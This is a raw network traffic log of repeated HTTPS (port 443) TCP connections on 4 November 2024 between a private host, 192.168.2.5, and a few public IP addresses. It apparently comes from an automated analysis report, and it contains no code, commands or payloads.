Nov 4, 2024 17:31:26.494237900 CET	49749	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:26.494242907 CET	443	49749	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:26.631743908 CET	443	49749	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:26.632040977 CET	443	49749	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:26.632117033 CET	49749	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:26.632153034 CET	49749	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:26.632169962 CET	443	49749	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:26.632181883 CET	49749	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:26.632188082 CET	443	49749	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:26.635130882 CET	49752	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:26.635150909 CET	443	49752	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:26.635238886 CET	49752	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:26.635380030 CET	49752	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:26.635387897 CET	443	49752	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:27.230628967 CET	443	49751	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:27.231251001 CET	49751	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:27.231282949 CET	443	49751	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:27.231770039 CET	49751	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:27.231775999 CET	443	49751	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:27.364401102 CET	443	49751	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:27.364617109 CET	443	49751	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:27.364698887 CET	49751	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:27.364784956 CET	49751	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:27.364809036 CET	443	49751	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:27.364820957 CET	49751	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:27.364826918 CET	443	49751	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:27.368102074 CET	49753	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:27.368135929 CET	443	49753	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:27.368309021 CET	49753	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:27.368429899 CET	49753	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:27.368443966 CET	443	49753	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:27.378612995 CET	443	49752	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:27.379303932 CET	49752	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:27.379318953 CET	443	49752	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:27.380050898 CET	49752	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:27.380055904 CET	443	49752	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:27.507994890 CET	443	49752	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:27.508672953 CET	443	49752	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:27.508752108 CET	49752	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:27.508799076 CET	49752	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:27.508799076 CET	49752	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:27.508805990 CET	443	49752	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:27.508814096 CET	443	49752	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:27.511883020 CET	49754	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:27.511907101 CET	443	49754	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:27.512181997 CET	49754	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:27.512181997 CET	49754	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:27.512207985 CET	443	49754	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:28.098797083 CET	443	49753	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:28.099814892 CET	49753	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:28.099822998 CET	443	49753	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:28.100125074 CET	49753	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:28.100130081 CET	443	49753	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:28.131077051 CET	443	49750	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:28.131632090 CET	49750	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:28.131659031 CET	443	49750	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:28.131994963 CET	49750	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:28.131999969 CET	443	49750	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:28.228374004 CET	443	49753	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:28.228543997 CET	443	49753	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:28.228617907 CET	49753	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:28.228646040 CET	49753	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:28.228646040 CET	49753	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:28.228669882 CET	443	49753	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:28.228678942 CET	443	49753	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:28.231267929 CET	49755	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:28.231297016 CET	443	49755	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:28.231396914 CET	49755	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:28.231679916 CET	49755	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:28.231700897 CET	443	49755	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:28.246037960 CET	443	49754	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:28.246495962 CET	49754	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:28.246520996 CET	443	49754	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:28.246956110 CET	49754	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:28.246963978 CET	443	49754	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:28.265697956 CET	443	49750	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:28.265815973 CET	443	49750	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:28.265872955 CET	49750	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:28.265957117 CET	49750	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:28.265980959 CET	443	49750	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:28.265993118 CET	49750	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:28.265999079 CET	443	49750	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:28.268409014 CET	49756	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:28.268466949 CET	443	49756	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:28.268537998 CET	49756	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:28.268667936 CET	49756	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:28.268685102 CET	443	49756	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:28.375972986 CET	443	49754	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:28.376404047 CET	443	49754	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:28.376485109 CET	49754	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:28.376526117 CET	49754	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:28.376557112 CET	443	49754	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:28.376574039 CET	49754	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:28.376580000 CET	443	49754	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:28.379064083 CET	49757	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:28.379096985 CET	443	49757	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:28.379179001 CET	49757	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:28.379321098 CET	49757	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:28.379332066 CET	443	49757	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:28.823159933 CET	49758	443	192.168.2.5	4.245.163.56
Nov 4, 2024 17:31:28.823220968 CET	443	49758	4.245.163.56	192.168.2.5
Nov 4, 2024 17:31:28.823286057 CET	49758	443	192.168.2.5	4.245.163.56
Nov 4, 2024 17:31:28.825830936 CET	49758	443	192.168.2.5	4.245.163.56
Nov 4, 2024 17:31:28.825845003 CET	443	49758	4.245.163.56	192.168.2.5
Nov 4, 2024 17:31:28.966681957 CET	443	49755	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:28.967446089 CET	49755	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:28.967458963 CET	443	49755	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:28.967945099 CET	49755	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:28.967950106 CET	443	49755	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:28.999274015 CET	443	49756	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:28.999829054 CET	49756	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:28.999851942 CET	443	49756	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:29.000284910 CET	49756	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:29.000293016 CET	443	49756	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:29.034256935 CET	49759	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:29.034288883 CET	443	49759	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:29.034359932 CET	49759	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:29.034957886 CET	49759	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:29.034971952 CET	443	49759	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:29.094463110 CET	443	49755	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:29.094777107 CET	443	49755	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:29.094830036 CET	49755	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:29.094891071 CET	49755	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:29.094908953 CET	443	49755	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:29.094918966 CET	49755	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:29.094924927 CET	443	49755	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:29.097832918 CET	49760	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:29.097887039 CET	443	49760	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:29.097963095 CET	49760	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:29.098143101 CET	49760	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:29.098161936 CET	443	49760	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:29.107386112 CET	443	49757	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:29.107825041 CET	49757	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:29.107836008 CET	443	49757	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:29.108295918 CET	49757	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:29.108299971 CET	443	49757	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:29.137983084 CET	443	49756	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:29.138077974 CET	443	49756	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:29.138128996 CET	49756	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:29.138472080 CET	49756	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:29.138493061 CET	443	49756	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:29.138506889 CET	49756	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:29.138513088 CET	443	49756	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:29.141388893 CET	49761	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:29.141438961 CET	443	49761	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:29.141510963 CET	49761	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:29.141664028 CET	49761	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:29.141674042 CET	443	49761	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:29.241023064 CET	443	49757	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:29.241250992 CET	443	49757	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:29.241293907 CET	49757	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:29.241360903 CET	49757	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:29.241375923 CET	443	49757	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:29.244786024 CET	49762	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:29.244821072 CET	443	49762	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:29.244884014 CET	49762	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:29.245192051 CET	49762	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:29.245203972 CET	443	49762	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:29.852778912 CET	443	49760	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:29.853591919 CET	49760	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:29.853615999 CET	443	49760	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:29.854084015 CET	49760	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:29.854089975 CET	443	49760	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:29.874597073 CET	443	49761	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:29.875097990 CET	49761	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:29.875117064 CET	443	49761	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:29.875586987 CET	49761	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:29.875592947 CET	443	49761	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:29.887512922 CET	443	49758	4.245.163.56	192.168.2.5
Nov 4, 2024 17:31:29.887581110 CET	49758	443	192.168.2.5	4.245.163.56
Nov 4, 2024 17:31:29.889576912 CET	49758	443	192.168.2.5	4.245.163.56
Nov 4, 2024 17:31:29.889585018 CET	443	49758	4.245.163.56	192.168.2.5
Nov 4, 2024 17:31:29.889844894 CET	443	49758	4.245.163.56	192.168.2.5
Nov 4, 2024 17:31:29.943039894 CET	49758	443	192.168.2.5	4.245.163.56
Nov 4, 2024 17:31:29.979032993 CET	443	49762	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:29.979487896 CET	49762	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:29.979509115 CET	443	49762	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:29.980190039 CET	49762	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:29.980196953 CET	443	49762	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:29.983382940 CET	443	49760	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:29.983588934 CET	443	49760	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:29.983650923 CET	49760	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:29.985018969 CET	49760	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:29.985038042 CET	443	49760	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:29.985049009 CET	49760	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:29.985055923 CET	443	49760	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:29.988671064 CET	49763	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:29.988697052 CET	443	49763	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:29.988826990 CET	49763	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:29.988945961 CET	49763	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:29.988957882 CET	443	49763	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.006329060 CET	49758	443	192.168.2.5	4.245.163.56
Nov 4, 2024 17:31:30.007431030 CET	443	49761	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.007514954 CET	443	49761	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.007565975 CET	49761	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:30.010032892 CET	49761	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:30.010049105 CET	443	49761	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.010055065 CET	49761	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:30.010060072 CET	443	49761	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.014409065 CET	49764	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:30.014461994 CET	443	49764	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.014574051 CET	49764	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:30.014975071 CET	49764	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:30.014991999 CET	443	49764	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.047332048 CET	443	49758	4.245.163.56	192.168.2.5
Nov 4, 2024 17:31:30.114182949 CET	443	49762	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.114372969 CET	443	49762	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.114443064 CET	49762	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:30.114672899 CET	49762	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:30.114689112 CET	443	49762	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.114700079 CET	49762	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:30.114706039 CET	443	49762	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.117717028 CET	49765	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:30.117753983 CET	443	49765	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.118108988 CET	49765	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:30.118243933 CET	49765	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:30.118257999 CET	443	49765	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.142544985 CET	443	49759	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:30.142636061 CET	49759	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:30.144371033 CET	49759	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:30.144380093 CET	443	49759	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:30.144620895 CET	443	49759	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:30.145945072 CET	49759	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:30.146054029 CET	49759	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:30.146060944 CET	443	49759	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:30.146238089 CET	49759	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:30.187333107 CET	443	49759	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:30.356153011 CET	443	49758	4.245.163.56	192.168.2.5
Nov 4, 2024 17:31:30.356178999 CET	443	49758	4.245.163.56	192.168.2.5
Nov 4, 2024 17:31:30.356185913 CET	443	49758	4.245.163.56	192.168.2.5
Nov 4, 2024 17:31:30.356218100 CET	443	49758	4.245.163.56	192.168.2.5
Nov 4, 2024 17:31:30.356236935 CET	443	49758	4.245.163.56	192.168.2.5
Nov 4, 2024 17:31:30.356245995 CET	443	49758	4.245.163.56	192.168.2.5
Nov 4, 2024 17:31:30.356300116 CET	49758	443	192.168.2.5	4.245.163.56
Nov 4, 2024 17:31:30.356316090 CET	443	49758	4.245.163.56	192.168.2.5
Nov 4, 2024 17:31:30.356336117 CET	49758	443	192.168.2.5	4.245.163.56
Nov 4, 2024 17:31:30.356363058 CET	49758	443	192.168.2.5	4.245.163.56
Nov 4, 2024 17:31:30.356764078 CET	443	49758	4.245.163.56	192.168.2.5
Nov 4, 2024 17:31:30.356841087 CET	49758	443	192.168.2.5	4.245.163.56
Nov 4, 2024 17:31:30.356848955 CET	443	49758	4.245.163.56	192.168.2.5
Nov 4, 2024 17:31:30.366903067 CET	49758	443	192.168.2.5	4.245.163.56
Nov 4, 2024 17:31:30.366926908 CET	443	49758	4.245.163.56	192.168.2.5
Nov 4, 2024 17:31:30.366935015 CET	49758	443	192.168.2.5	4.245.163.56
Nov 4, 2024 17:31:30.367104053 CET	443	49758	4.245.163.56	192.168.2.5
Nov 4, 2024 17:31:30.367144108 CET	443	49758	4.245.163.56	192.168.2.5
Nov 4, 2024 17:31:30.367508888 CET	49758	443	192.168.2.5	4.245.163.56
Nov 4, 2024 17:31:30.393527985 CET	443	49759	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:30.394097090 CET	49759	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:30.394112110 CET	443	49759	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:30.394129992 CET	49759	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:30.394298077 CET	443	49759	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:30.394361973 CET	49759	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:30.394361973 CET	49759	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:30.747066975 CET	443	49763	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.753240108 CET	49763	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:30.753257990 CET	443	49763	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.753696918 CET	49763	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:30.753703117 CET	443	49763	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.757558107 CET	443	49764	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.758038998 CET	49764	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:30.758061886 CET	443	49764	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.758496046 CET	49764	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:30.758501053 CET	443	49764	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.858711004 CET	443	49765	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.859338045 CET	49765	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:30.859353065 CET	443	49765	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.859848976 CET	49765	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:30.859854937 CET	443	49765	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.885996103 CET	443	49763	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.886204958 CET	443	49763	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.886264086 CET	49763	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:30.886296988 CET	49763	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:30.886313915 CET	443	49763	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.886321068 CET	49763	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:30.886326075 CET	443	49763	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.889354944 CET	443	49764	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.889379025 CET	49766	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:30.889431953 CET	443	49766	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.889503002 CET	49766	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:30.889621019 CET	443	49764	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.889664888 CET	49764	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:30.889764071 CET	49764	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:30.889764071 CET	49766	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:30.889764071 CET	49764	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:30.889779091 CET	443	49764	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.889797926 CET	443	49766	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.889806032 CET	443	49764	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.892112017 CET	49767	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:30.892148972 CET	443	49767	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.892224073 CET	49767	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:30.892339945 CET	49767	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:30.892354012 CET	443	49767	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.990633011 CET	443	49765	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.990722895 CET	443	49765	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.990768909 CET	49765	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:30.990982056 CET	49765	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:30.991003036 CET	443	49765	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.991013050 CET	49765	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:30.991024017 CET	443	49765	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.994168997 CET	49768	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:30.994216919 CET	443	49768	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:30.994328022 CET	49768	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:30.994451046 CET	49768	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:30.994461060 CET	443	49768	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:31.619824886 CET	443	49766	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:31.620805025 CET	49766	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:31.620836020 CET	443	49766	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:31.621351004 CET	49766	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:31.621356964 CET	443	49766	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:31.658324003 CET	443	49767	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:31.660609961 CET	49767	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:31.660624027 CET	443	49767	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:31.661102057 CET	49767	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:31.661108017 CET	443	49767	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:31.748135090 CET	443	49768	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:31.748759985 CET	443	49766	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:31.748828888 CET	443	49766	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:31.748923063 CET	49766	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:31.749279022 CET	49768	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:31.749290943 CET	443	49768	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:31.749771118 CET	49768	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:31.749777079 CET	443	49768	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:31.749972105 CET	49766	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:31.749991894 CET	443	49766	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:31.750004053 CET	49766	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:31.750010967 CET	443	49766	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:31.752779007 CET	49769	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:31.752849102 CET	443	49769	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:31.752969027 CET	49769	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:31.753102064 CET	49769	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:31.753123045 CET	443	49769	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:31.793236971 CET	443	49767	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:31.793771029 CET	443	49767	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:31.793843031 CET	49767	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:31.793888092 CET	49767	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:31.793905973 CET	443	49767	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:31.793915987 CET	49767	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:31.793921947 CET	443	49767	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:31.796633005 CET	49770	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:31.796669960 CET	443	49770	13.107.246.45	192.168.2.5
